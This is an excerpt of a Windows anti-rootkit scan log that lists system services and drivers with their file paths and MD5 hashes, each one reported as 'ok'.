13:26:45.0936 5964	dldtCATSCustConnectService (31b7596edd9505fcbb07670fb69cbb48) C:\Windows\system32\spool\DRIVERS\W32X86\3\\dldtserv.exe
13:26:45.0936 5964	dldtCATSCustConnectService - ok
13:26:45.0983 5964	dldt_device - ok
13:26:46.0029 5964	Dnscache (57d762f6f5974af0da2be88a3349baaa) C:\Windows\System32\dnsrslvr.dll
13:26:46.0045 5964	Dnscache - ok
13:26:46.0544 5964	dot3svc (324fd74686b1ef5e7c19a8af49e748f6) C:\Windows\System32\dot3svc.dll
13:26:46.0544 5964	dot3svc - ok
13:26:46.0716 5964	DPS (a622e888f8aa2f6b49e9bc466f0e5def) C:\Windows\system32\dps.dll
13:26:46.0716 5964	DPS - ok
13:26:46.0778 5964	drmkaud (97fef831ab90bee128c9af390e243f80) C:\Windows\system32\drivers\drmkaud.sys
13:26:46.0794 5964	drmkaud - ok
13:26:46.0856 5964	DXGKrnl (c68ac676b0ef30cfbb1080adce49eb1f) C:\Windows\System32\drivers\dxgkrnl.sys
13:26:46.0872 5964	DXGKrnl - ok
13:26:46.0919 5964	E1G60 (f88fb26547fd2ce6d0a5af2985892c48) C:\Windows\system32\DRIVERS\E1G60I32.sys
13:26:46.0934 5964	E1G60 - ok
13:26:47.0277 5964	EapHost (c0b95e40d85cd807d614e264248a45b9) C:\Windows\System32\eapsvc.dll
13:26:47.0293 5964	EapHost - ok
13:26:47.0511 5964	Ecache (7f64ea048dcfac7acf8b4d7b4e6fe371) C:\Windows\system32\drivers\ecache.sys
13:26:47.0527 5964	Ecache - ok
13:26:47.0901 5964	ehRecvr (9be3744d295a7701eb425332014f0797) C:\Windows\ehome\ehRecvr.exe
13:26:48.0026 5964	ehRecvr - ok
13:26:48.0447 5964	ehSched (ad1870c8e5d6dd340c829e6074bf3c3f) C:\Windows\ehome\ehsched.exe
13:26:48.0494 5964	ehSched - ok
13:26:48.0572 5964	ehstart (c27c4ee8926e74aa72efcab24c5242c3) C:\Windows\ehome\ehstart.dll
13:26:48.0572 5964	ehstart - ok
13:26:48.0619 5964	ElbyCDIO (aaa8999a169e39fb8b48ae49cd6ac30a) C:\Windows\system32\Drivers\ElbyCDIO.sys
13:26:48.0619 5964	ElbyCDIO - ok
13:26:48.0650 5964	ElbyDelay (e205c313417da6fa7afe85912a310a65) C:\Windows\system32\Drivers\ElbyDelay.sys
13:26:48.0650 5964	ElbyDelay - ok
13:26:48.0713 5964	elxstor (e8f3f21a71720c84bcf423b80028359f) C:\Windows\system32\drivers\elxstor.sys
13:26:48.0759 5964	elxstor - ok
13:26:49.0305 5964	EMDMgmt (4e6b23dfc917ea39306b529b773950f4) C:\Windows\system32\emdmgmt.dll
13:26:49.0352 5964	EMDMgmt - ok
13:26:49.0586 5964	EventSystem (67058c46504bc12d821f38cf99b7b28f) C:\Windows\system32\es.dll
13:26:49.0586 5964	EventSystem - ok
13:26:49.0680 5964	exfat (22b408651f9123527bcee54b4f6c5cae) C:\Windows\system32\drivers\exfat.sys
13:26:49.0680 5964	exfat - ok
13:26:49.0945 5964	fastfat (1e9b9a70d332103c52995e957dc09ef8) C:\Windows\system32\drivers\fastfat.sys
13:26:49.0945 5964	fastfat - ok
13:26:49.0992 5964	fdc (63bdada84951b9c03e641800e176898a) C:\Windows\system32\DRIVERS\fdc.sys
13:26:49.0992 5964	fdc - ok
13:26:50.0023 5964	fdPHost (6629b5f0e98151f4afdd87567ea32ba3) C:\Windows\system32\fdPHost.dll
13:26:50.0023 5964	fdPHost - ok
13:26:50.0070 5964	FDResPub (89ed56dce8e47af40892778a5bd31fd2) C:\Windows\system32\fdrespub.dll
13:26:50.0070 5964	FDResPub - ok
13:26:50.0117 5964	FileInfo (a8c0139a884861e3aae9cfe73b208a9f) C:\Windows\system32\drivers\fileinfo.sys
13:26:50.0117 5964	FileInfo - ok
13:26:50.0163 5964	Filetrace (0ae429a696aecbc5970e3cf2c62635ae) C:\Windows\system32\drivers\filetrace.sys
13:26:50.0163 5964	Filetrace - ok
13:26:50.0179 5964	flpydisk (6603957eff5ec62d25075ea8ac27de68) C:\Windows\system32\DRIVERS\flpydisk.sys
13:26:50.0179 5964	flpydisk - ok
13:26:50.0241 5964	FltMgr (01334f9ea68e6877c4ef05d3ea8abb05) C:\Windows\system32\drivers\fltmgr.sys
13:26:50.0241 5964	FltMgr - ok
13:26:50.0897 5964	FontCache (8ce364388c8eca59b14b539179276d44) C:\Windows\system32\FntCache.dll
13:26:50.0928 5964	FontCache - ok
13:26:51.0193 5964	FontCache3.0.0.0 (c7fbdd1ed42f82bfa35167a5c9803ea3) C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
13:26:51.0209 5964	FontCache3.0.0.0 - ok
13:26:51.0240 5964	Fs_Rec (b972a66758577e0bfd1de0f91aaa27b5) C:\Windows\system32\drivers\Fs_Rec.sys
13:26:51.0240 5964	Fs_Rec - ok
13:26:51.0271 5964	gagp30kx (4e1cd0a45c50a8882616cae5bf82f3c5) C:\Windows\system32\drivers\gagp30kx.sys
13:26:51.0287 5964	gagp30kx - ok
13:26:51.0349 5964	GEARAspiWDM (8182ff89c65e4d38b2de4bb0fb18564e) C:\Windows\system32\Drivers\GEARAspiWDM.sys
13:26:51.0349 5964	GEARAspiWDM - ok
13:26:51.0583 5964	Giraffic - ok
13:26:51.0911 5964	gpsvc (cd5d0aeee35dfd4e986a5aa1500a6e66) C:\Windows\System32\gpsvc.dll
13:26:51.0957 5964	gpsvc - ok
13:26:52.0207 5964	gusvc (751c1d2ca2abf4a9f5a6b8d7d45b907c) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
13:26:52.0238 5964	gusvc - ok
13:26:52.0301 5964	HdAudAddService (cb04c744be0a61b1d648faed182c3b59) C:\Windows\system32\drivers\HdAudio.sys
13:26:52.0301 5964	HdAudAddService - ok
13:26:52.0613 5964	HDAudBus (062452b7ffd68c8c042a6261fe8dff4a) C:\Windows\system32\DRIVERS\HDAudBus.sys
13:26:52.0628 5964	HDAudBus - ok
13:26:52.0659 5964	HidBth (1338520e78d90154ed6be8f84de5fceb) C:\Windows\system32\drivers\hidbth.sys
13:26:52.0659 5964	HidBth - ok
13:26:52.0691 5964	HidIr (ff3160c3a2445128c5a6d9b076da519e) C:\Windows\system32\drivers\hidir.sys
13:26:52.0691 5964	HidIr - ok
13:26:52.0800 5964	hidserv (84067081f3318162797385e11a8f0582) C:\Windows\System32\hidserv.dll
13:26:52.0815 5964	hidserv - ok
13:26:52.0878 5964	HidUsb (cca4b519b17e23a00b826c55716809cc) C:\Windows\system32\DRIVERS\hidusb.sys
13:26:52.0893 5964	HidUsb - ok
13:26:52.0940 5964	hkmsvc (d8ad255b37da92434c26e4876db7d418) C:\Windows\system32\kmsvc.dll
13:26:52.0987 5964	hkmsvc - ok
13:26:53.0034 5964	HpCISSs (df353b401001246853763c4b7aaa6f50) C:\Windows\system32\drivers\hpcisss.sys
13:26:53.0034 5964	HpCISSs - ok
13:26:53.0611 5964	HTTP (f870aa3e254628ebeafe754108d664de) C:\Windows\system32\drivers\HTTP.sys
13:26:53.0673 5964	HTTP - ok
13:26:53.0736 5964	i2omp (324c2152ff2c61abae92d09f3cca4d63) C:\Windows\system32\drivers\i2omp.sys
13:26:53.0736 5964	i2omp - ok
13:26:53.0876 5964	i8042prt (22d56c8184586b7a1f6fa60be5f5a2bd) C:\Windows\system32\DRIVERS\i8042prt.sys
13:26:53.0892 5964	i8042prt - ok
13:26:53.0923 5964	iaStorV (c957bf4b5d80b46c5017bf0101e6c906) C:\Windows\system32\drivers\iastorv.sys
13:26:53.0923 5964	iaStorV - ok
13:26:54.0297 5964	IDriverT (6f95324909b502e2651442c1548ab12f) C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
13:26:54.0313 5964	IDriverT - ok
13:26:54.0672 5964	idsvc (98477b08e61945f974ed9fdc4cb6bdab) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
13:26:54.0703 5964	idsvc - ok
13:26:55.0249 5964	iirsp (2d077bf86e843f901d8db709c95b49a5) C:\Windows\system32\drivers\iirsp.sys
13:26:55.0249 5964	iirsp - ok
13:26:55.0623 5964	IKEEXT (9908d8a397b76cd8d31d0d383c5773c9) C:\Windows\System32\ikeext.dll
13:26:55.0655 5964	IKEEXT - ok
13:26:55.0982 5964	IntcAzAudAddService (7bd4e0428776d11c8e8e26f9f5508690) C:\Windows\system32\drivers\RTKVHDA.sys
13:26:56.0045 5964	IntcAzAudAddService - ok
13:26:56.0856 5964	intelide (97469037714070e45194ed318d636401) C:\Windows\system32\drivers\intelide.sys
13:26:56.0856 5964	intelide - ok
13:26:56.0887 5964	intelppm (ce44cc04262f28216dd4341e9e36a16f) C:\Windows\system32\DRIVERS\intelppm.sys
13:26:56.0887 5964	intelppm - ok
13:26:56.0949 5964	IPBusEnum (9ac218c6e6105477484c6fdbe7d409a4) C:\Windows\system32\ipbusenum.dll
13:26:56.0949 5964	IPBusEnum - ok
13:26:56.0996 5964	IpFilterDriver (62c265c38769b864cb25b4bcf62df6c3) C:\Windows\system32\DRIVERS\ipfltdrv.sys
13:26:56.0996 5964	IpFilterDriver - ok
13:26:57.0105 5964	iphlpsvc (1998bd97f950680bb55f55a7244679c2) C:\Windows\System32\iphlpsvc.dll
13:26:57.0121 5964	iphlpsvc - ok
13:26:57.0121 5964	IpInIp - ok
13:26:57.0168 5964	IPMIDRV (40f34f8aba2a015d780e4b09138b6c17) C:\Windows\system32\drivers\ipmidrv.sys
13:26:57.0168 5964	IPMIDRV - ok
13:26:57.0261 5964	IPNAT (8793643a67b42cec66490b2a0cf92d68) C:\Windows\system32\DRIVERS\ipnat.sys
13:26:57.0277 5964	IPNAT - ok
13:26:57.0683 5964	iPod Service (57edb35ea2feca88f8b17c0c095c9a56) C:\Program Files\iPod\bin\iPodService.exe
13:26:57.0729 5964	iPod Service - ok
13:26:57.0761 5964	IRENUM (109c0dfb82c3632fbd11949b73aeeac9) C:\Windows\system32\drivers\irenum.sys
13:26:57.0761 5964	IRENUM - ok
13:26:57.0807 5964	isapnp (350fca7e73cf65bcef43fae1e4e91293) C:\Windows\system32\drivers\isapnp.sys
13:26:57.0839 5964	isapnp - ok
13:26:57.0917 5964	iScsiPrt (232fa340531d940aac623b121a595034) C:\Windows\system32\DRIVERS\msiscsi.sys
13:26:57.0917 5964	iScsiPrt - ok
13:26:57.0948 5964	iteatapi (bced60d16156e428f8df8cf27b0df150) C:\Windows\system32\drivers\iteatapi.sys
13:26:57.0948 5964	iteatapi - ok
13:26:57.0963 5964	iteraid (06fa654504a498c30adca8bec4e87e7e) C:\Windows\system32\drivers\iteraid.sys
13:26:57.0963 5964	iteraid - ok
13:26:58.0041 5964	kbdclass (37605e0a8cf00cbba538e753e4344c6e) C:\Windows\system32\DRIVERS\kbdclass.sys
13:26:58.0041 5964	kbdclass - ok
13:26:58.0151 5964	kbdhid (ede59ec70e25c24581add1fbec7325f7) C:\Windows\system32\DRIVERS\kbdhid.sys
13:26:58.0151 5964	kbdhid - ok
13:26:58.0197 5964	KeyIso (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:26:58.0197 5964	KeyIso - ok
13:26:58.0244 5964	KR10I (1e0d65f7ffeb4e99b2eec1ccb5754cc8) C:\Windows\system32\drivers\kr10i.sys
13:26:58.0322 5964	KR10I - ok
13:26:58.0603 5964	KR10N (a1963360e74931222a67356c8ad48378) C:\Windows\system32\drivers\kr10n.sys
13:26:58.0712 5964	KR10N - ok
13:26:58.0759 5964	KR3NPXP (485e005cd51ff502fb16483eb4b69c17) C:\Windows\system32\drivers\kr3npxp.sys
13:26:58.0931 5964	KR3NPXP - ok
13:26:59.0009 5964	KSecDD (2b2f1638466e8cb091400c9019cc730e) C:\Windows\system32\Drivers\ksecdd.sys
13:26:59.0040 5964	KSecDD - ok
13:26:59.0492 5964	KtmRm (8078f8f8f7a79e2e6b494523a828c585) C:\Windows\system32\msdtckrm.dll
13:26:59.0570 5964	KtmRm - ok
13:26:59.0664 5964	LanmanServer (1bf5eebfd518dd7298434d8c862f825d) C:\Windows\System32\srvsvc.dll
13:26:59.0664 5964	LanmanServer - ok
13:26:59.0820 5964	LanmanWorkstation (1db69705b695b987082c8baec0c6b34f) C:\Windows\System32\wkssvc.dll
13:26:59.0835 5964	LanmanWorkstation - ok
13:26:59.0976 5964	lltdio (d1c5883087a0c3f1344d9d55a44901f6) C:\Windows\system32\DRIVERS\lltdio.sys
13:26:59.0991 5964	lltdio - ok
13:27:00.0085 5964	lltdsvc (2d5a428872f1442631d0959a34abff63) C:\Windows\System32\lltdsvc.dll
13:27:00.0085 5964	lltdsvc - ok
13:27:00.0147 5964	lmhosts (35d40113e4a5b961b6ce5c5857702518) C:\Windows\System32\lmhsvc.dll
13:27:00.0163 5964	lmhosts - ok
13:27:00.0194 5964	LPCFilter (515fc18cabee0158a324b08b1c2667cf) C:\Windows\system32\DRIVERS\LPCFilter.sys
13:27:00.0194 5964	LPCFilter - ok
13:27:00.0257 5964	LSI_FC (a2262fb9f28935e862b4db46438c80d2) C:\Windows\system32\drivers\lsi_fc.sys
13:27:00.0257 5964	LSI_FC - ok
13:27:00.0288 5964	LSI_SAS (30d73327d390f72a62f32c103daf1d6d) C:\Windows\system32\drivers\lsi_sas.sys
13:27:00.0288 5964	LSI_SAS - ok
13:27:00.0335 5964	LSI_SCSI (e1e36fefd45849a95f1ab81de0159fe3) C:\Windows\system32\drivers\lsi_scsi.sys
13:27:00.0350 5964	LSI_SCSI - ok
13:27:00.0491 5964	luafv (8f5c7426567798e62a3b3614965d62cc) C:\Windows\system32\drivers\luafv.sys
13:27:00.0522 5964	luafv - ok
13:27:00.0709 5964	McAfee SiteAdvisor Service (6c3d154fff0a97a6c3d9f78d60c41655) c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
13:27:00.0725 5964	McAfee SiteAdvisor Service - ok
13:27:00.0771 5964	Mcx2Svc (aef9babb8a506bc4ce0451a64aaded46) C:\Windows\system32\Mcx2Svc.dll
13:27:00.0771 5964	Mcx2Svc - ok
13:27:01.0037 5964	MDM (11f714f85530a2bd134074dc30e99fca) C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
13:27:01.0068 5964	MDM - ok
13:27:01.0146 5964	megasas (d153b14fc6598eae8422a2037553adce) C:\Windows\system32\drivers\megasas.sys
13:27:01.0161 5964	megasas - ok
13:27:01.0255 5964	MMCSS (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
13:27:01.0271 5964	MMCSS - ok
13:27:01.0333 5964	Modem (e13b5ea0f51ba5b1512ec671393d09ba) C:\Windows\system32\drivers\modem.sys
13:27:01.0333 5964	Modem - ok
13:27:01.0427 5964	monitor (0a9bb33b56e294f686abb7c1e4e2d8a8) C:\Windows\system32\DRIVERS\monitor.sys
13:27:01.0427 5964	monitor - ok
13:27:01.0489 5964	mouclass (5bf6a1326a335c5298477754a506d263) C:\Windows\system32\DRIVERS\mouclass.sys
13:27:01.0489 5964	mouclass - ok
13:27:01.0520 5964	mouhid (93b8d4869e12cfbe663915502900876f) C:\Windows\system32\DRIVERS\mouhid.sys
13:27:01.0520 5964	mouhid - ok
13:27:01.0583 5964	MountMgr (bdafc88aa6b92f7842416ea6a48e1600) C:\Windows\system32\drivers\mountmgr.sys
13:27:01.0583 5964	MountMgr - ok
13:27:01.0692 5964	MpFilter (d993bea500e7382dc4e760bf4f35efcb) C:\Windows\system32\DRIVERS\MpFilter.sys
13:27:01.0692 5964	MpFilter - ok
13:27:01.0754 5964	mpio (583a41f26278d9e0ea548163d6139397) C:\Windows\system32\drivers\mpio.sys
13:27:01.0754 5964	mpio - ok
13:27:01.0785 5964	mpsdrv (22241feba9b2defa669c8cb0a8dd7d2e) C:\Windows\system32\drivers\mpsdrv.sys
13:27:01.0801 5964	mpsdrv - ok
13:27:02.0035 5964	MpsSvc (5de62c6e9108f14f6794060a9bdecaec) C:\Windows\system32\mpssvc.dll
13:27:02.0051 5964	MpsSvc - ok
13:27:02.0082 5964	Mraid35x (4fbbb70d30fd20ec51f80061703b001e) C:\Windows\system32\drivers\mraid35x.sys
13:27:02.0082 5964	Mraid35x - ok
13:27:02.0207 5964	MRxDAV (82cea0395524aacfeb58ba1448e8325c) C:\Windows\system32\drivers\mrxdav.sys
13:27:02.0222 5964	MRxDAV - ok
13:27:02.0316 5964	mrxsmb (1e94971c4b446ab2290deb71d01cf0c2) C:\Windows\system32\DRIVERS\mrxsmb.sys
13:27:02.0316 5964	mrxsmb - ok
13:27:02.0378 5964	mrxsmb10 (4fccb34d793b116423209c0f8b7a3b03) C:\Windows\system32\DRIVERS\mrxsmb10.sys
13:27:02.0394 5964	mrxsmb10 - ok
13:27:02.0425 5964	mrxsmb20 (c3cb1b40ad4a0124d617a1199b0b9d7c) C:\Windows\system32\DRIVERS\mrxsmb20.sys
13:27:02.0425 5964	mrxsmb20 - ok
13:27:02.0472 5964	msahci (742aed7939e734c36b7e8d6228ce26b7) C:\Windows\system32\drivers\msahci.sys
13:27:02.0472 5964	msahci - ok
13:27:02.0534 5964	msdsm (3fc82a2ae4cc149165a94699183d3028) C:\Windows\system32\drivers\msdsm.sys
13:27:02.0534 5964	msdsm - ok
13:27:02.0612 5964	MSDTC (fd7520cc3a80c5fc8c48852bb24c6ded) C:\Windows\System32\msdtc.exe
13:27:02.0612 5964	MSDTC - ok
13:27:02.0675 5964	Msfs (a9927f4a46b816c92f461acb90cf8515) C:\Windows\system32\drivers\Msfs.sys
13:27:02.0675 5964	Msfs - ok
13:27:02.0737 5964	msisadrv (0f400e306f385c56317357d6dea56f62) C:\Windows\system32\drivers\msisadrv.sys
13:27:02.0753 5964	msisadrv - ok
13:27:02.0924 5964	MSiSCSI (85466c0757a23d9a9aecdc0755203cb2) C:\Windows\system32\iscsiexe.dll
13:27:02.0924 5964	MSiSCSI - ok
13:27:02.0924 5964	msiserver - ok
13:27:02.0971 5964	MSKSSRV (d8c63d34d9c9e56c059e24ec7185cc07) C:\Windows\system32\drivers\MSKSSRV.sys
13:27:02.0971 5964	MSKSSRV - ok
13:27:03.0080 5964	MsMpSvc (24516bf4e12a46cb67302e2cdcb8cddf) c:\Program Files\Microsoft Security Client\MsMpEng.exe
13:27:03.0080 5964	MsMpSvc - ok
13:27:03.0096 5964	MSPCLOCK (1d373c90d62ddb641d50e55b9e78d65e) C:\Windows\system32\drivers\MSPCLOCK.sys
13:27:03.0096 5964	MSPCLOCK - ok
13:27:03.0143 5964	MSPQM (b572da05bf4e098d4bba3a4734fb505b) C:\Windows\system32\drivers\MSPQM.sys
13:27:03.0143 5964	MSPQM - ok
13:27:03.0189 5964	MsRPC (b49456d70555de905c311bcda6ec6adb) C:\Windows\system32\drivers\MsRPC.sys
13:27:03.0189 5964	MsRPC - ok
13:27:03.0299 5964	mssmbios (e384487cb84be41d09711c30ca79646c) C:\Windows\system32\DRIVERS\mssmbios.sys
13:27:03.0299 5964	mssmbios - ok
13:27:03.0345 5964	MSTEE (7199c1eec1e4993caf96b8c0a26bd58a) C:\Windows\system32\drivers\MSTEE.sys
13:27:03.0345 5964	MSTEE - ok
13:27:03.0595 5964	Mup (6a57b5733d4cb702c8ea4542e836b96c) C:\Windows\system32\Drivers\mup.sys
13:27:03.0611 5964	Mup - ok
13:27:03.0673 5964	napagent (e4eaf0c5c1b41b5c83386cf212ca9584) C:\Windows\system32\qagentRT.dll
13:27:03.0689 5964	napagent - ok
13:27:03.0751 5964	NativeWifiP (85c44fdff9cf7e72a40dcb7ec06a4416) C:\Windows\system32\DRIVERS\nwifi.sys
13:27:03.0751 5964	NativeWifiP - ok
13:27:03.0813 5964	NCHSSVAD (0df9cc7b5cc173f545723f23e68fac93) C:\Windows\system32\drivers\nchssvad.sys
13:27:03.0845 5964	NCHSSVAD - ok
13:27:04.0172 5964	NDIS (1357274d1883f68300aeadd15d7bbb42) C:\Windows\system32\drivers\ndis.sys
13:27:04.0172 5964	NDIS - ok
13:27:04.0219 5964	NdisTapi (0e186e90404980569fb449ba7519ae61) C:\Windows\system32\DRIVERS\ndistapi.sys
13:27:04.0219 5964	NdisTapi - ok
13:27:04.0266 5964	Ndisuio (d6973aa34c4d5d76c0430b181c3cd389) C:\Windows\system32\DRIVERS\ndisuio.sys
13:27:04.0266 5964	Ndisuio - ok
13:27:04.0547 5964	NdisWan (818f648618ae34f729fdb47ec68345c3) C:\Windows\system32\DRIVERS\ndiswan.sys
13:27:04.0547 5964	NdisWan - ok
13:27:04.0609 5964	NDProxy (71dab552b41936358f3b541ae5997fb3) C:\Windows\system32\drivers\NDProxy.sys
13:27:04.0625 5964	NDProxy - ok
13:27:04.0640 5964	NetBIOS (bcd093a5a6777cf626434568dc7dba78) C:\Windows\system32\DRIVERS\netbios.sys
13:27:04.0656 5964	NetBIOS - ok
13:27:04.0703 5964	netbt (ecd64230a59cbd93c85f1cd1cab9f3f6) C:\Windows\system32\DRIVERS\netbt.sys
13:27:04.0703 5964	netbt - ok
13:27:04.0749 5964	Netlogon (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:27:04.0765 5964	Netlogon - ok
13:27:04.0827 5964	Netman (c8052711daecc48b982434c5116ca401) C:\Windows\System32\netman.dll
13:27:04.0859 5964	Netman - ok
13:27:05.0093 5964	netprofm (2ef3bbe22e5a5acd1428ee387a0d0172) C:\Windows\System32\netprofm.dll
13:27:05.0108 5964	netprofm - ok
13:27:05.0514 5964	NetTcpPortSharing (d6c4e4a39a36029ac0813d476fbd0248) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
13:27:05.0514 5964	NetTcpPortSharing - ok
13:27:05.0701 5964	nfrd960 (2e7fb731d4790a1bc6270accefacb36e) C:\Windows\system32\drivers\nfrd960.sys
13:27:05.0717 5964	nfrd960 - ok
13:27:05.0763 5964	NisDrv (b52f26bade7d7e4a79706e3fd91834cd) C:\Windows\system32\DRIVERS\NisDrvWFP.sys
13:27:05.0763 5964	NisDrv - ok
13:27:06.0200 5964	NisSrv (290c0d4c4889398797f8df3be00b9698) c:\Program Files\Microsoft Security Client\NisSrv.exe
13:27:06.0200 5964	NisSrv - ok
13:27:06.0497 5964	NlaSvc (2997b15415f9bbe05b5a4c1c85e0c6a2) C:\Windows\System32\nlasvc.dll
13:27:06.0512 5964	NlaSvc - ok
13:27:06.0606 5964	Npfs (d36f239d7cce1931598e8fb90a0dbc26) C:\Windows\system32\drivers\Npfs.sys
13:27:06.0606 5964	Npfs - ok
13:27:06.0653 5964	nsi (8bb86f0c7eea2bded6fe095d0b4ca9bd) C:\Windows\system32\nsisvc.dll
13:27:06.0653 5964	nsi - ok
13:27:06.0684 5964	nsiproxy (609773e344a97410ce4ebf74a8914fcf) C:\Windows\system32\drivers\nsiproxy.sys
13:27:06.0684 5964	nsiproxy - ok
13:27:07.0105 5964	Ntfs (6a4a98cee84cf9e99564510dda4baa47) C:\Windows\system32\drivers\Ntfs.sys
13:27:07.0152 5964	Ntfs - ok
13:27:07.0199 5964	ntrigdigi (e875c093aec0c978a90f30c9e0dfbb72) C:\Windows\system32\drivers\ntrigdigi.sys
13:27:07.0199 5964	ntrigdigi - ok
13:27:07.0230 5964	Null (c5dbbcda07d780bda9b685df333bb41e) C:\Windows\system32\drivers\Null.sys
13:27:07.0230 5964	Null - ok
13:27:07.0261 5964	nvraid (e69e946f80c1c31c53003bfbf50cbb7c) C:\Windows\system32\drivers\nvraid.sys
13:27:07.0277 5964	nvraid - ok
13:27:07.0308 5964	nvstor (9e0ba19a28c498a6d323d065db76dffc) C:\Windows\system32\drivers\nvstor.sys
13:27:07.0308 5964	nvstor - ok
13:27:07.0339 5964	nv_agp (07c186427eb8fcc3d8d7927187f260f7) C:\Windows\system32\drivers\nv_agp.sys
13:27:07.0339 5964	nv_agp - ok
13:27:07.0355 5964	NwlnkFlt - ok
13:27:07.0355 5964	NwlnkFwd - ok
13:27:07.0495 5964	ohci1394 (6f310e890d46e246e0e261a63d9b36b4) C:\Windows\system32\DRIVERS\ohci1394.sys
13:27:07.0495 5964	ohci1394 - ok
13:27:07.0838 5964	p2pimsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:27:07.0869 5964	p2pimsvc - ok
13:27:07.0885 5964	p2psvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:27:07.0885 5964	p2psvc - ok
13:27:08.0041 5964	Parport (0fa9b5055484649d63c303fe404e5f4d) C:\Windows\system32\drivers\parport.sys
13:27:08.0057 5964	Parport - ok
13:27:08.0103 5964	partmgr (b9c2b89f08670e159f7181891e449cd9) C:\Windows\system32\drivers\partmgr.sys
13:27:08.0103 5964	partmgr - ok
13:27:08.0166 5964	Parvdm (4f9a6a8a31413180d0fcb279ad5d8112) C:\Windows\system32\drivers\parvdm.sys
13:27:08.0197 5964	Parvdm - ok
13:27:08.0228 5964	PcaSvc (c6276ad11f4bb49b58aa1ed88537f14a) C:\Windows\System32\pcasvc.dll
13:27:08.0228 5964	PcaSvc - ok
13:27:08.0525 5964	pci (941dc1d19e7e8620f40bbc206981efdb) C:\Windows\system32\drivers\pci.sys
13:27:08.0571 5964	pci - ok
13:27:08.0665 5964	pciide (1636d43f10416aeb483bc6001097b26c) C:\Windows\system32\drivers\pciide.sys
13:27:08.0681 5964	pciide - ok
13:27:08.0712 5964	pcmcia (3bb2244f343b610c29c98035504c9b75) C:\Windows\system32\DRIVERS\pcmcia.sys
13:27:08.0712 5964	pcmcia - ok
13:27:08.0743 5964	pcouffin (5b6c11de7e839c05248ced8825470fef) C:\Windows\system32\Drivers\pcouffin.sys
13:27:08.0743 5964	pcouffin - ok
13:27:09.0008 5964	PEAUTH (6349f6ed9c623b44b52ea3c63c831a92) C:\Windows\system32\drivers\peauth.sys
13:27:09.0055 5964	PEAUTH - ok
13:27:09.0133 5964	pinger (6dbf2ac2bdaff355995ab25eccc4cfe1) C:\Toshiba\IVP\ISM\pinger.exe
13:27:09.0133 5964	pinger - ok
13:27:09.0882 5964	pla (b1689df169143f57053f795390c99db3) C:\Windows\system32\pla.dll
13:27:09.0944 5964	pla - ok
13:27:10.0833 5964	PlugPlay (c5e7f8a996ec0a82d508fd9064a5569e) C:\Windows\system32\umpnpmgr.dll
13:27:10.0849 5964	PlugPlay - ok
13:27:11.0223 5964	PNRPAutoReg (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:27:11.0223 5964	PNRPAutoReg - ok
13:27:11.0239 5964	PNRPsvc (0c8e8e61ad1eb0b250b846712c917506) C:\Windows\system32\p2psvc.dll
13:27:11.0255 5964	PNRPsvc - ok
13:27:11.0723 5964	PolicyAgent (d0494460421a03cd5225cca0059aa146) C:\Windows\System32\ipsecsvc.dll
13:27:11.0738 5964	PolicyAgent - ok
13:27:11.0847 5964	PptpMiniport (ecfffaec0c1ecd8dbc77f39070ea1db1) C:\Windows\system32\DRIVERS\raspptp.sys
13:27:11.0847 5964	PptpMiniport - ok
13:27:11.0894 5964	Processor (0e3cef5d28b40cf273281d620c50700a) C:\Windows\system32\drivers\processr.sys
13:27:11.0894 5964	Processor - ok
13:27:11.0957 5964	ProfSvc (0508faa222d28835310b7bfca7a77346) C:\Windows\system32\profsvc.dll
13:27:11.0957 5964	ProfSvc - ok
13:27:12.0035 5964	ProtectedStorage (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:27:12.0035 5964	ProtectedStorage - ok
13:27:12.0144 5964	PSched (99514faa8df93d34b5589187db3aa0ba) C:\Windows\system32\DRIVERS\pacer.sys
13:27:12.0144 5964	PSched - ok
13:27:12.0237 5964	ql2300 (ccdac889326317792480c0a67156a1ec) C:\Windows\system32\drivers\ql2300.sys
13:27:12.0284 5964	ql2300 - ok
13:27:12.0378 5964	ql40xx (81a7e5c076e59995d54bc1ed3a16e60b) C:\Windows\system32\drivers\ql40xx.sys
13:27:12.0378 5964	ql40xx - ok
13:27:12.0549 5964	QWAVE (e9ecae663f47e6cb43962d18ab18890f) C:\Windows\system32\qwave.dll
13:27:12.0549 5964	QWAVE - ok
13:27:12.0596 5964	QWAVEdrv (9f5e0e1926014d17486901c88eca2db7) C:\Windows\system32\drivers\qwavedrv.sys
13:27:12.0596 5964	QWAVEdrv - ok
13:27:12.0643 5964	RasAcd (147d7f9c556d259924351feb0de606c3) C:\Windows\system32\DRIVERS\rasacd.sys
13:27:12.0659 5964	RasAcd - ok
13:27:12.0705 5964	RasAuto (f6a452eb4ceadbb51c9e0ee6b3ecef0f) C:\Windows\System32\rasauto.dll
13:27:12.0705 5964	RasAuto - ok
13:27:12.0783 5964	Rasl2tp (a214adbaf4cb47dd2728859ef31f26b0) C:\Windows\system32\DRIVERS\rasl2tp.sys
13:27:12.0799 5964	Rasl2tp - ok
13:27:12.0861 5964	RasMan (75d47445d70ca6f9f894b032fbc64fcf) C:\Windows\System32\rasmans.dll
13:27:12.0877 5964	RasMan - ok
13:27:12.0939 5964	RasPppoe (509a98dd18af4375e1fc40bc175f1def) C:\Windows\system32\DRIVERS\raspppoe.sys
13:27:12.0939 5964	RasPppoe - ok
13:27:13.0002 5964	RasSstp (2005f4a1e05fa09389ac85840f0a9e4d) C:\Windows\system32\DRIVERS\rassstp.sys
13:27:13.0017 5964	RasSstp - ok
13:27:13.0142 5964	rdbss (b14c9d5b9add2f84f70570bbbfaa7935) C:\Windows\system32\DRIVERS\rdbss.sys
13:27:13.0142 5964	rdbss - ok
